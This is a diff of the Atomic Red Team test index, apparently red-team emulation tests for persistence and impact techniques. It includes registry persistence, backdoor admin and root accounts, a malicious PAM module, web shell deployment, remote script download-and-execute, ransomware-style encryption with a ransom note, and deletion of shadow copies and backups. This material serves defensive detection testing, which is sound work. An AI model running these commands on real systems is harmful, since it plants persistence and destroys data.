default: '"fcfhplploccackoneaefokcmbjfbkenj", "fdcgdnkidjaadafnichfpabhfomcebme" - ' +' dependency_executor_name: powershell dependencies: - description: 'Chrome must be installed - ' +' prereq_command: if ((Test-Path "C:\Program Files\Google\Chrome\Application\chrome.exe") -Or (Test-Path "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe")) {exit 0} else {exit 1} @@ -44421,7 +44421,7 @@ persistence: auto_generated_guid: fdda2626-5234-4c90-b163-60849a24c0b8 description: 'Leverage Global Flags Settings - ' +' supported_platforms: - windows input_arguments: 
@@ -44437,19 +44437,19 @@ persistence: command: 'REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\#{target_binary}" /v Debugger /d "#{payload_binary}" - ' +' cleanup_command: 'reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\#{target_binary}" /v Debugger /f >nul 2>&1 - ' +' name: command_prompt elevation_required: true - name: IFEO Global Flags auto_generated_guid: 46b1f278-c8ee-4aa5-acce-65e77b11f3c1 description: 'Leverage Global Flags Settings - ' +' supported_platforms: - windows input_arguments: @@ -44633,7 +44633,7 @@ persistence: description: 'This test uses the insmod command to load a kernel module for Linux. - ' +' supported_platforms: - linux input_arguments: @@ -44657,10 +44657,10 @@ persistence: dependencies: - description: 'The kernel module must exist on disk at specified location - ' +' prereq_command: 'if [ -f #{module_path} ]; then exit 0; else exit 1; fi; - ' +' get_prereq_command: | if [ ! -d #{temp_folder} ]; then mkdir #{temp_folder}; touch #{temp_folder}/safe_to_delete; fi; cp #{module_source_path}/* #{temp_folder}/ @@ -44669,7 +44669,7 @@ persistence: executor: command: 'sudo insmod #{module_path} - ' +' cleanup_command: | sudo rmmod #{module_name} [ -f #{temp_folder}/safe_to_delete ] && rm -rf #{temp_folder} @@ -44875,7 +44875,7 @@ persistence: auto_generated_guid: a5983dee-bf6c-4eaf-951c-dbc1a7b90900 description: 'Create a plist and execute it - ' +' supported_platforms: - macos input_arguments: @@ -44892,15 +44892,15 @@ persistence: - description: 'The shared library must exist on disk at specified location (#{path_malicious_plist}) - ' +' prereq_command: 'if [ -f #{path_malicious_plist} ]; then exit 0; else exit 1; fi; - ' +' get_prereq_command: 'echo "The shared library doesn''t exist. Check the path"; exit 1; - ' +' executor: name: bash elevation_required: true 
@@ -44994,7 +44994,7 @@ persistence: auto_generated_guid: 03ab8df5-3a6b-4417-b6bd-bb7a5cfd74cf description: 'Utilize LaunchDaemon to launch `Hello World` - ' +' supported_platforms: - macos input_arguments: @@ -45011,15 +45011,15 @@ persistence: - description: 'The shared library must exist on disk at specified location (#{path_malicious_plist}) - ' +' prereq_command: 'if [ -f #{path_malicious_plist} ]; then exit 0; else exit 1; fi; - ' +' get_prereq_command: 'echo "The plist file doesn''t exist. Check the path and try again."; exit 1; - ' +' executor: name: bash elevation_required: true @@ -45163,7 +45163,7 @@ persistence: auto_generated_guid: 40d8eabd-e394-46f6-8785-b9bfa1d011d2 description: 'Create a user via useradd - ' +' supported_platforms: - linux input_arguments: @@ -45174,17 +45174,17 @@ persistence: executor: command: 'useradd -M -N -r -s /bin/bash -c evil_account #{username} - ' +' cleanup_command: 'userdel #{username} - ' +' name: bash elevation_required: true - name: Create a user account on a MacOS system auto_generated_guid: '01993ba5-1da3-4e15-a719-b690d4f0f0b2' description: 'Creates a user on a MacOS system with dscl - ' +' supported_platforms: - macos input_arguments: @@ -45206,7 +45206,7 @@ persistence: dscl . -create /Users/#{username} NFSHomeDirectory /Users/#{username} cleanup_command: 'dscl . -delete /Users/#{username} - ' +' name: bash elevation_required: true - name: Create a new user in a command prompt @@ -45228,10 +45228,10 @@ persistence: executor: command: 'net user /add "#{username}" "#{password}" - ' +' cleanup_command: 'net user /del "#{username}" >nul 2>&1 - ' +' name: command_prompt elevation_required: true - name: Create a new user in PowerShell 
@@ -45249,10 +45249,10 @@ persistence: executor: command: 'New-LocalUser -Name "#{username}" -NoPassword - ' +' cleanup_command: 'Remove-LocalUser -Name "#{username}" -ErrorAction Ignore - ' +' name: powershell elevation_required: true - name: Create a new user in Linux with `root` UID and GID. @@ -45260,7 +45260,7 @@ persistence: description: 'Creates a new user in Linux and adds the user to the `root` group. This technique was used by adversaries during the Butter attack campaign. - ' +' supported_platforms: - linux input_arguments: @@ -45278,14 +45278,14 @@ persistence: if [ $(cat /etc/os-release | grep -i 'Name="ubuntu"') ]; then echo "#{username}:#{password}" | sudo chpasswd; else echo "#{password}" | passwd --stdin #{username}; fi; cleanup_command: 'userdel #{username} - ' +' name: bash elevation_required: true - name: Create a new Windows admin user auto_generated_guid: fda74566-a604-4581-a4cc-fbbe21d66559 description: 'Creates a new admin user in a command prompt. - ' +' supported_platforms: - windows input_arguments: @@ -45303,7 +45303,7 @@ persistence: net localgroup administrators "#{username}" /add cleanup_command: 'net user /del "#{username}" >nul 2>&1 - ' +' name: command_prompt elevation_required: true T1078.003: @@ -45431,7 +45431,7 @@ persistence: auto_generated_guid: f047c7de-a2d9-406e-a62b-12a09d9516f4 description: 'Mac logon script - ' +' supported_platforms: - macos executor: @@ -45660,7 +45660,7 @@ persistence: description: 'Netsh interacts with other operating system components using dynamic-link library (DLL) files - ' +' supported_platforms: - windows input_arguments: @@ -45671,7 +45671,7 @@ persistence: executor: command: 'netsh.exe add helper #{helper_file} - ' +' name: command_prompt T1556.004: technique: 
@@ -46040,11 +46040,11 @@ persistence: command: 'reg add "HKEY_CURRENT_USER\Software\Microsoft\Office test\Special\Perf" /t REG_SZ /d "#{thing_to_execute}" - ' +' cleanup_command: 'reg delete "HKEY_CURRENT_USER\Software\Microsoft\Office test\Special\Perf" /f >nul 2>&1 - ' +' name: command_prompt T1137.003: technique: @@ -46179,11 +46179,11 @@ persistence: command: 'reg.exe add HKCU\Software\Microsoft\Office\#{outlook_version}\Outlook\WebView\#{outlook_folder} /v URL /t REG_SZ /d #{url} /f - ' +' cleanup_command: 'reg.exe delete HKCU\Software\Microsoft\Office\#{outlook_version}\Outlook\WebView\#{outlook_folder} /v URL /f >nul 2>&1 - ' +' T1137.005: technique: external_references: @@ -46304,7 +46304,7 @@ persistence: description: 'Uses PowerShell to install and register a password filter DLL. Requires a reboot and administrative privileges. - ' +' supported_platforms: - windows input_arguments: @@ -46317,14 +46317,14 @@ persistence: - description: 'AtomicPasswordFilter.dll must exist on disk at specified location (#{input_dll}) - ' +' prereq_command: 'if (Test-Path #{input_dll}) {exit 0} else {exit 1} - ' +' get_prereq_command: 'Write-Host "You must provide your own password filter dll" - ' +' executor: command: | $passwordFilterName = (Copy-Item "#{input_dll}" -Destination "C:\Windows\System32" -PassThru).basename @@ -46740,7 +46740,7 @@ persistence: auto_generated_guid: 394a538e-09bb-4a4a-95d1-b93cf12682a8 description: 'Modify MacOS plist file in one of two directories - ' +' supported_platforms: - macos executor: @@ -46847,10 +46847,10 @@ persistence: elevation_required: true command: 'sudo sed -i "#{index}s,^,#{pam_rule}\n,g" #{path_to_pam_conf} - ' +' cleanup_command: 'sudo sed -i "\,#{pam_rule},d" #{path_to_pam_conf} - ' +' - name: Malicious PAM module auto_generated_guid: 65208808-3125-4a2e-8389-a0a00e9ab326 description: | 
@@ -46884,35 +46884,35 @@ persistence: - description: 'The PAM development library must be installed to build the PAM module - ' +' prereq_command: 'if [ -f /usr/include/security/pam_modules.h ]; then exit 0; else exit 1; fi; - ' +' get_prereq_command: 'if [ -n "`which apt-get`" ]; then sudo apt-get -y install libpam0g-dev; elif [ -n "`which yum`" ]; then sudo yum -y install pam-devel; fi - ' +' - description: 'The PAM module must exist on disk at specified location (#{path_to_pam_module}) - ' +' prereq_command: 'if [ -f #{path_to_pam_module} ]; then exit 0; else exit 1; fi; - ' +' get_prereq_command: 'sudo gcc -shared -fPIC -o #{path_to_pam_module} #{path_to_pam_module_source} - ' +' executor: name: sh elevation_required: true command: 'sudo sed -i "#{index}s,^,#{pam_rule}\n,g" #{path_to_pam_conf} - ' +' cleanup_command: 'sudo sed -i "\,#{pam_rule},d" #{path_to_pam_conf} - ' +' T1205.001: technique: external_references: @@ -47045,11 +47045,11 @@ persistence: command: 'reg add "hklm\system\currentcontrolset\control\print\monitors\ART" /v "Atomic Red Team" /d "#{monitor_dll}" /t REG_SZ - ' +' cleanup_command: 'reg delete "hklm\system\currentcontrolset\control\print\monitors\ART" /f >nul 2>&1 - ' +' name: command_prompt elevation_required: true T1546.013: @@ -47135,7 +47135,7 @@ persistence: profile pofile that points to a malicious executable. Upon execution, calc.exe will be launched. - ' +' supported_platforms: - windows input_arguments: @@ -47151,13 +47151,13 @@ persistence: dependencies: - description: 'Ensure a powershell profile exists for the current user - ' +' prereq_command: 'if (Test-Path #{ps_profile}) {exit 0} else {exit 1} - ' +' get_prereq_command: 'New-Item -Path #{ps_profile} -Type File -Force - ' +' executor: command: | Add-Content #{ps_profile} -Value "" 
@@ -47375,14 +47375,14 @@ persistence: command: 'sudo echo osascript -e ''tell app "Finder" to display dialog "Hello World"'' >> /etc/rc.common - ' +' elevation_required: true name: bash - name: rc.common auto_generated_guid: c33f3d80-5f04-419b-a13a-854d1cbdbf3a description: 'Modify rc.common - ' +' supported_platforms: - linux executor: @@ -47398,12 +47398,12 @@ persistence: ];then sudo rm /etc/rc.common;else sudo cp $origfilename /etc/rc.common && sudo rm $origfilename;fi - ' +' - name: rc.local auto_generated_guid: 126f71af-e1c9-405c-94ef-26a47b16c102 description: 'Modify rc.local - ' +' supported_platforms: - linux executor: @@ -47419,7 +47419,7 @@ persistence: ];then sudo rm /etc/rc.local;else sudo cp $origfilename /etc/rc.local && sudo rm $origfilename;fi - ' +' T1542.004: technique: created: '2020-10-20T00:05:48.790Z' @@ -47545,10 +47545,10 @@ persistence: executor: command: 'sudo defaults write com.apple.loginwindow LoginHook #{script} - ' +' cleanup_command: 'sudo defaults delete com.apple.loginwindow LoginHook - ' +' elevation_required: true name: sh T1108: @@ -47743,11 +47743,11 @@ persistence: command: 'REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Atomic Red Team" /t REG_SZ /F /D "#{command_to_execute}" - ' +' cleanup_command: 'REG DELETE "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Atomic Red Team" /f >nul 2>&1 - ' +' name: command_prompt - name: Reg Key RunOnce auto_generated_guid: 554cbd88-cde1-4b56-8168-0be552eed9eb @@ -47765,11 +47765,11 @@ persistence: command: 'REG ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend /v 1 /d "#{thing_to_execute}" - ' +' cleanup_command: 'REG DELETE HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend /v 1 /f >nul 2>&1 - ' +' name: command_prompt elevation_required: true - name: PowerShell Registry RunOnce 
@@ -47795,7 +47795,7 @@ persistence: cleanup_command: 'Remove-ItemProperty -Path #{reg_key_path} -Name "NextRun" -Force -ErrorAction Ignore - ' +' name: powershell elevation_required: true - name: Suspicious vbs file run from startup Folder @@ -48016,10 +48016,10 @@ persistence: ~/.ssh/authorized_keys); echo $ssh_authorized_keys > ~/.ssh/authorized_keys; fi; - ' +' cleanup_command: 'unset ssh_authorized_keys - ' +' T1053.005: technique: created: '2019-11-27T14:58:00.429Z' @@ -48117,7 +48117,7 @@ persistence: description: 'Upon successful execution, cmd.exe will create a scheduled task to spawn cmd.exe at 20:10. - ' +' supported_platforms: - windows input_arguments: @@ -48134,10 +48134,10 @@ persistence: elevation_required: false command: 'SCHTASKS /Create /SC ONCE /TN spawn /TR #{task_command} /ST #{time} - ' +' cleanup_command: 'SCHTASKS /Delete /TN spawn /F >nul 2>&1 - ' +' - name: Scheduled task Remote auto_generated_guid: 2e5eac3e-327b-4a88-a0c0-c4057039a8dd description: | @@ -48173,11 +48173,11 @@ persistence: command: 'SCHTASKS /Create /S #{target} /RU #{user_name} /RP #{password} /TN "Atomic task" /TR "#{task_command}" /SC daily /ST #{time} - ' +' cleanup_command: 'SCHTASKS /Delete /S #{target} /U #{user_name} /P #{password} /TN "Atomic task" /F >nul 2>&1 - ' +' - name: Powershell Cmdlet Scheduled Task auto_generated_guid: af9fd58f-c4ac-4bf2-a9ba-224b71ff25fd description: | @@ -48199,7 +48199,7 @@ persistence: cleanup_command: 'Unregister-ScheduledTask -TaskName "AtomicTask" -confirm:$false >$null 2>&1 - ' +' - name: Task Scheduler via VBA auto_generated_guid: ecd3fa21-7792-41a2-8726-2c5c673414d3 description: | @@ -48216,7 +48216,7 @@ persistence: dependencies: - description: 'Microsoft #{ms_product} must be installed - ' +' prereq_command: | try { New-Object -COMObject "#{ms_product}.Application" | Out-Null 
@@ -48227,7 +48227,7 @@ persistence: get_prereq_command: 'Write-Host "You will need to install Microsoft #{ms_product} manually to meet this requirement" - ' +' executor: command: "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12\nIEX (iwr \"https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1\" @@ -48240,7 +48240,7 @@ persistence: login from XML by leveraging WMI class PS_ScheduledTask. Does the same thing as Register-ScheduledTask cmdlet behind the scenes. - ' +' supported_platforms: - windows executor: @@ -48252,7 +48252,7 @@ persistence: cleanup_command: 'Unregister-ScheduledTask -TaskName "T1053_005_WMI" -confirm:$false >$null 2>&1 - ' +' T1053: technique: id: attack-pattern--35dd844a-b219-4e2b-a6bb-efa9a75995a9 @@ -48388,7 +48388,7 @@ persistence: sets it as the screensaver so it will execute for persistence. Requires a reboot and logon. - ' +' supported_platforms: - windows input_arguments: @@ -48698,7 +48698,7 @@ persistence: description: 'Change Service registry ImagePath of a bengin service to a malicious file - ' +' supported_platforms: - windows input_arguments: @@ -48718,22 +48718,22 @@ persistence: dependencies: - description: 'The service must exist (#{weak_service_name}) - ' +' prereq_command: 'if (Get-Service #{weak_service_name}) {exit 0} else {exit 1} - ' +' get_prereq_command: 'sc.exe create #{weak_service_name} binpath= "#{weak_service_path}" - ' +' executor: command: 'reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\#{weak_service_name}" /f /v ImagePath /d "#{malicious_service_path}" - ' +' cleanup_command: 'sc.exe delete #{weak_service_name} - ' +' name: command_prompt T1547.009: technique: @@ -48806,7 +48806,7 @@ persistence: #{shortcut_file_path} cleanup_command: 'del -f #{shortcut_file_path} >nul 2>&1 - ' +' name: command_prompt - name: Create shortcut to cmd in startup folders auto_generated_guid: cfdc954d-4bb0-4027-875b-a1893ce406f2 
@@ -48907,10 +48907,10 @@ persistence: executor: command: 'sudo touch /Library/StartupItems/EvilStartup.plist - ' +' cleanup_command: 'sudo rm /Library/StartupItems/EvilStartup.plist - ' +' name: sh elevation_required: true T1542.001: @@ -49087,7 +49087,7 @@ persistence: description: 'This test creates a Systemd service unit file and enables it as a service. - ' +' supported_platforms: - linux input_arguments: @@ -49160,15 +49160,15 @@ persistence: dependencies: - description: 'System must be Ubuntu ,Kali OR CentOS. - ' +' prereq_command: 'if [ $(cat /etc/os-release | grep -i ID=ubuntu) ] || [ $(cat /etc/os-release | grep -i ID=kali) ] || [ $(cat /etc/os-release | grep -i ''ID="centos"'') ]; then exit /b 0; else exit /b 1; fi; - ' +' get_prereq_command: 'echo Please run from Ubuntu ,Kali OR CentOS. - ' +' executor: name: bash elevation_required: true @@ -49320,20 +49320,20 @@ persistence: dependencies: - description: 'Check if systemd-run exists on the machine - ' +' prereq_command: 'if [ -x "$(command -v systemd-run)" ]; then exit 0; else exit 1; fi; - ' +' get_prereq_command: 'echo "Install systemd on the machine."; exit 1; - ' +' executor: elevation_required: false command: 'systemd-run --user --unit=Atomic-Red-Team --on-calendar ''*:0/1'' /bin/sh -c ''echo "$(date) $(whoami)" >>/tmp/log'' - ' +' cleanup_command: | systemctl --user stop Atomic-Red-Team.service systemctl --user stop Atomic-Red-Team.timer @@ -49350,20 +49350,20 @@ persistence: dependencies: - description: 'Check if systemd-run exists on the machine - ' +' prereq_command: 'if [ -x "$(command -v systemd-run)" ]; then exit 0; else exit 1; fi; - ' +' get_prereq_command: 'echo "Install systemd on the machine."; exit 1; - ' +' executor: elevation_required: true command: 'systemd-run --unit=Atomic-Red-Team --on-calendar ''*:0/1'' /bin/sh -c ''echo "$(date) $(whoami)" >>/tmp/log'' - ' +' cleanup_command: | systemctl stop Atomic-Red-Team.service systemctl stop Atomic-Red-Team.timer 
@@ -49665,13 +49665,13 @@ persistence: dependencies: - description: 'Microsoft Exchange SnapIn must be installed - ' +' prereq_command: 'Get-TransportAgent -TransportService FrontEnd - ' +' get_prereq_command: 'Add-PSSnapin Microsoft.Exchange.Management.PowerShell.SnapIn - ' +' executor: command: | Install-TransportAgent -Name #{transport_agent_identity} -TransportAgentFactory #{class_factory} -AssemblyPath #{dll_path} @@ -49883,7 +49883,7 @@ persistence: auto_generated_guid: 94500ae1-7e31-47e3-886b-c328da46872f description: 'Adds a command to the .bash_profile file of the current user - ' +' supported_platforms: - macos - linux @@ -49895,13 +49895,13 @@ persistence: executor: command: 'echo "#{command_to_add}" >> ~/.bash_profile - ' +' name: sh - name: Add command to .bashrc auto_generated_guid: 0a898315-4cfa-4007-bafe-33a4646d115f description: 'Adds a command to the .bashrc file of the current user - ' +' supported_platforms: - macos - linux @@ -49913,7 +49913,7 @@ persistence: executor: command: 'echo "#{command_to_add}" >> ~/.bashrc - ' +' name: sh T1078: technique: @@ -50082,10 +50082,10 @@ persistence: dependencies: - description: 'Web shell must exist on disk at specified location (#{web_shells}) - ' +' prereq_command: 'if (Test-Path #{web_shells}) {exit 0} else {exit 1} - ' +' get_prereq_command: | New-Item -Type Directory (split-path #{web_shells}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1505.003/src/b.jsp" -OutFile "#{web_shells}/b.jsp" @@ -50094,7 +50094,7 @@ persistence: executor: command: 'xcopy /I /Y #{web_shells} #{web_shell_path} - ' +' cleanup_command: | del #{web_shell_path}\b.jsp /q >nul 2>&1 del #{web_shell_path}\tests.jsp /q >nul 2>&1 
@@ -50367,10 +50367,10 @@ persistence: dependencies: - description: 'Service binary must exist on disk at specified location (#{binary_path}) - ' +' prereq_command: 'if (Test-Path #{binary_path}) {exit 0} else {exit 1} - ' +' get_prereq_command: | New-Item -Type Directory (split-path #{binary_path}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1543.003/bin/AtomicService.exe" -OutFile "#{binary_path}" @@ -50403,10 +50403,10 @@ persistence: dependencies: - description: 'Service binary must exist on disk at specified location (#{binary_path}) - ' +' prereq_command: 'if (Test-Path #{binary_path}) {exit 0} else {exit 1} - ' +' get_prereq_command: | New-Item -Type Directory (split-path #{binary_path}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1543.003/bin/AtomicService.exe" -OutFile "#{binary_path}" @@ -50502,11 +50502,11 @@ persistence: command: 'Set-ItemProperty "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\" "Shell" "explorer.exe, #{binary_to_execute}" -Force - ' +' cleanup_command: 'Remove-ItemProperty -Path "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\" -Name "Shell" -Force -ErrorAction Ignore - ' +' name: powershell - name: Winlogon Userinit Key Persistence - PowerShell auto_generated_guid: fb32c935-ee2e-454b-8fa3-1c46b42e8dfb @@ -50525,11 +50525,11 @@ persistence: command: 'Set-ItemProperty "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\" "Userinit" "Userinit.exe, #{binary_to_execute}" -Force - ' +' cleanup_command: 'Remove-ItemProperty -Path "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\" -Name "Userinit" -Force -ErrorAction Ignore - ' +' name: powershell - name: Winlogon Notify Key Logon Persistence - PowerShell auto_generated_guid: d40da266-e073-4e5a-bb8b-2b385023e5f9 
@@ -50551,7 +50551,7 @@ persistence: cleanup_command: 'Remove-Item "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify" -Force -ErrorAction Ignore - ' +' name: powershell T1547.013: technique: @@ -50695,7 +50695,7 @@ impact: net.exe user #{user_account} #{new_password} cleanup_command: 'net.exe user #{user_account} /delete >nul 2>&1 - ' +' name: command_prompt elevation_required: true - name: Delete User - Windows @@ -50703,7 +50703,7 @@ impact: description: 'Deletes a user account to prevent access. Upon execution, run the command "net user" to verify that the new "AtomicUser" account was deleted. - ' +' supported_platforms: - windows input_arguments: @@ -50725,21 +50725,21 @@ impact: auto_generated_guid: 43f71395-6c37-498e-ab17-897d814a0947 description: 'This test will remove an account from the domain admins group - ' +' supported_platforms: - windows dependency_executor_name: powershell dependencies: - description: 'Requires the Active Directory module for powershell to be installed. - ' +' prereq_command: 'if(Get-Module -ListAvailable -Name ActiveDirectory) {exit 0} else {exit 1} - ' +' get_prereq_command: 'Add-WindowsCapability -Online -Name "Rsat.ActiveDirectory.DS-LDS.Tools~~~~0.0.1.0" - ' +' input_arguments: super_user: description: Account used to run the execution command (must include domain). @@ -50983,10 +50983,10 @@ impact: - description: 'Secure delete tool from Sysinternals must exist on disk at specified location (#{sdelete_exe}) - ' +' prereq_command: 'if (Test-Path #{sdelete_exe}) {exit 0} else {exit 1} - ' +' get_prereq_command: | Invoke-WebRequest "https://download.sysinternals.com/files/SDelete.zip" -OutFile "$env:TEMP\SDelete.zip" Expand-Archive $env:TEMP\SDelete.zip $env:TEMP\Sdelete -Force 
@@ -51017,7 +51017,7 @@ impact: command: 'dd of=#{file_to_overwrite} if=#{overwrite_source} count=$(ls -l #{file_to_overwrite} | awk ''{print $5}'') iflag=count_bytes - ' +' name: bash - name: Overwrite deleted data on C drive auto_generated_guid: 321fd25e-0007-417f-adec-33232252be19 @@ -51029,7 +51029,7 @@ impact: executor: command: 'cipher.exe /w:C: - ' +' name: command_prompt T1486: technique: @@ -51109,7 +51109,7 @@ impact: auto_generated_guid: 7b8ce084-3922-4618-8d22-95f996173765 description: 'Uses gpg to encrypt a file - ' +' supported_platforms: - linux input_arguments: @@ -51133,10 +51133,10 @@ impact: dependencies: - description: 'Finds where gpg is located - ' +' prereq_command: 'which_gpg=`which gpg` - ' +' get_prereq_command: "(which yum && yum -y epel-release gpg)||(which apt-get && DEBIAN_FRONTEND=noninteractive apt-get install -y gpg)\n" executor: @@ -51145,15 +51145,15 @@ impact: command: 'echo "#{pwd_for_encrypted_file}" | $which_gpg --batch --yes --passphrase-fd 0 --cipher-algo #{encryption_alg} -o #{encrypted_file_path} -c #{input_file_path} - ' +' cleanup_command: 'rm #{encrypted_file_path} - ' +' - name: Encrypt files using 7z (Linux) auto_generated_guid: 53e6735a-4727-44cc-b35b-237682a151ad description: 'Uses 7z to encrypt a file - ' +' supported_platforms: - linux input_arguments: @@ -51173,10 +51173,10 @@ impact: dependencies: - description: 'Finds where 7z is located - ' +' prereq_command: 'which_7z=`which 7z` - ' +' get_prereq_command: '' executor: name: bash @@ -51191,7 +51191,7 @@ impact: an inturruption authentication to target system. If root permissions are not available then attempts to encrypt data within user''s home directory. - ' +' supported_platforms: - linux input_arguments: @@ -51218,7 +51218,7 @@ impact: - description: 'Finds where ccencrypt and ccdecrypt is located and copies input file - ' +' prereq_command: | which_ccencrypt=`which ccencrypt` which_ccdecrypt=`which ccdecrypt` 
@@ -51233,14 +51233,14 @@ impact: #{user_input_file_path}; file #{user_input_file_path}.cpt; #{impact_command}; fi - ' +' cleanup_command: "if [[ $USER == \"root\" ]]; then mv #{cped_file_path} #{root_input_file_path}; else cp #{cped_file_path} #{user_input_file_path}; fi \n" - name: Encrypt files using openssl (Linux) auto_generated_guid: 142752dc-ca71-443b-9359-cf6f497315f1 description: 'Uses openssl to encrypt a file - ' +' supported_platforms: - linux input_arguments: @@ -51268,10 +51268,10 @@ impact: dependencies: - description: 'Finds where openssl is located - ' +' prereq_command: 'which_openssl=`which openssl` - ' +' get_prereq_command: '' executor: name: bash @@ -51294,10 +51294,10 @@ impact: elevation_required: true command: 'echo T1486 - Purelocker Ransom Note > %USERPROFILE%\Desktop\YOUR_FILES.txt - ' +' cleanup_command: 'del %USERPROFILE%\Desktop\YOUR_FILES.txt >nul 2>&1 - ' +' T1565: technique: external_references: @@ -51948,18 +51948,18 @@ impact: - description: 'Create volume shadow copy of C:\ . This prereq command only works on Windows Server or Windows 8. - ' +' prereq_command: 'if(!(vssadmin.exe list shadows | findstr "No items found that satisfy the query.")) { exit 0 } else { exit 1 } - ' +' get_prereq_command: 'vssadmin.exe create shadow /for=c: - ' +' executor: command: 'vssadmin.exe delete shadows /all /quiet - ' +' name: command_prompt elevation_required: true - name: Windows - Delete Volume Shadow Copies via WMI @@ -51972,7 +51972,7 @@ impact: executor: command: 'wmic.exe shadowcopy delete - ' +' name: command_prompt elevation_required: true - name: Windows - wbadmin Delete Windows Backup Catalog @@ -51985,7 +51985,7 @@ impact: executor: command: 'wbadmin delete catalog -quiet - ' +' name: command_prompt elevation_required: true - name: Windows - Disable Windows Recovery Console Repair 
@@ -52016,7 +52016,7 @@ impact: executor: command: 'Get-WmiObject Win32_Shadowcopy | ForEach-Object {$_.Delete();} - ' +' name: powershell elevation_required: true - name: Windows - Delete Backup Files @@ -52030,7 +52030,7 @@ impact: command: 'del /s /f /q c:\*.VHD c:\*.bac c:\*.bak c:\*.wbcat c:\*.bkf c:\Backup*.* c:\backup*.* c:\*.set c:\*.win c:\*.dsk - ' +' name: command_prompt elevation_required: true - name: Windows - wbadmin Delete systemstatebackup @@ -52039,13 +52039,13 @@ impact: technique is used by numerous ransomware families. This may only be successful on server platforms that have Windows Backup enabled. - ' +' supported_platforms: - windows executor: command: 'wbadmin delete systemstatebackup -keepVersions:0 - ' +' name: command_prompt elevation_required: true - name: Windows - Disable the SR scheduled task @@ -52053,17 +52053,17 @@ impact: description: 'Use schtasks.exe to disable the System Restore (SR) scheduled task - ' +' supported_platforms: - windows executor: command: 'schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable - ' +' cleanup_command: 'schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /enable >nul 2>&1 - ' +' name: command_prompt elevation_required: true T1491.001: @@ -52125,7 +52125,7 @@ impact: auto_generated_guid: 30558d53-9d76-41c4-9267-a7bd5184bed3 description: 'Downloads an image from a URL and sets it as the desktop wallpaper. - ' +' supported_platforms: - windows input_arguments: @@ -52492,7 +52492,7 @@ impact: executor: command: 'yes > /dev/null - ' +' name: bash T1565.003: technique: @@ -52710,10 +52710,10 @@ impact: executor: command: 'sc.exe stop #{service_name} - ' +' cleanup_command: 'sc.exe start #{service_name} >nul 2>&1 - ' +' name: command_prompt elevation_required: true - name: Windows - Stop service using net.exe 
@@ -52732,10 +52732,10 @@ impact: executor: command: 'net.exe stop #{service_name} - ' +' cleanup_command: 'net.exe start #{service_name} >nul 2>&1 - ' +' name: command_prompt elevation_required: true - name: Windows - Stop service by killing process @@ -52755,7 +52755,7 @@ impact: executor: command: 'taskkill.exe /f /im #{process_name} - ' +' name: command_prompt T1565.001: technique: @@ -52866,7 +52866,7 @@ impact: auto_generated_guid: ad254fa8-45c0-403b-8c77-e00b3d3e7a64 description: 'This test shuts down a Windows system. - ' +' supported_platforms: - windows input_arguments: @@ -52877,14 +52877,14 @@ impact: executor: command: 'shutdown /s /t #{timeout} - ' +' name: command_prompt elevation_required: true - name: Restart System - Windows auto_generated_guid: f4648f0d-bf78-483c-bafc-3ec99cd1c302 description: 'This test restarts a Windows system. - ' +' supported_platforms: - windows input_arguments: @@ -52895,14 +52895,14 @@ impact: executor: command: 'shutdown /r /t #{timeout} - ' +' name: command_prompt elevation_required: true - name: Restart System via `shutdown` - macOS/Linux auto_generated_guid: 6326dbc4-444b-4c04-88f4-27e94d0327cb description: 'This test restarts a macOS/Linux system. - ' +' supported_platforms: - macos - linux @@ -52914,14 +52914,14 @@ impact: executor: command: 'shutdown -r #{timeout} - ' +' name: bash elevation_required: true - name: Shutdown System via `shutdown` - macOS/Linux auto_generated_guid: 4963a81e-a3ad-4f02-adda-812343b351de description: 'This test shuts down a macOS/Linux system using a halt. - ' +' supported_platforms: - macos - linux 
@@ -52933,73 +52933,73 @@ impact: executor: command: 'shutdown -h #{timeout} - ' +' name: bash elevation_required: true - name: Restart System via `reboot` - macOS/Linux auto_generated_guid: 47d0b042-a918-40ab-8cf9-150ffe919027 description: 'This test restarts a macOS/Linux system via `reboot`. - ' +' supported_platforms: - macos - linux executor: command: 'reboot - ' +' name: bash elevation_required: true - name: Shutdown System via `halt` - Linux auto_generated_guid: 918f70ab-e1ef-49ff-bc57-b27021df84dd description: 'This test shuts down a Linux system using `halt`. - ' +' supported_platforms: - linux executor: command: 'halt -p - ' +' name: bash elevation_required: true - name: Reboot System via `halt` - Linux auto_generated_guid: 78f92e14-f1e9-4446-b3e9-f1b921f2459e description: 'This test restarts a Linux system using `halt`. - ' +' supported_platforms: - linux executor: command: 'halt --reboot - ' +' name: bash elevation_required: true - name: Shutdown System via `poweroff` - Linux auto_generated_guid: 73a90cd2-48a2-4ac5-8594-2af35fa909fa description: 'This test shuts down a Linux system using `poweroff`. - ' +' supported_platforms: - linux executor: command: 'poweroff - ' +' name: bash elevation_required: true - name: Reboot System via `poweroff` - Linux auto_generated_guid: 61303105-ff60-427b-999e-efb90b314e41 description: 'This test restarts a Linux system using `poweroff`. - ' +' supported_platforms: - linux executor: command: 'poweroff --reboot - ' +' name: bash elevation_required: true T1565.002: 
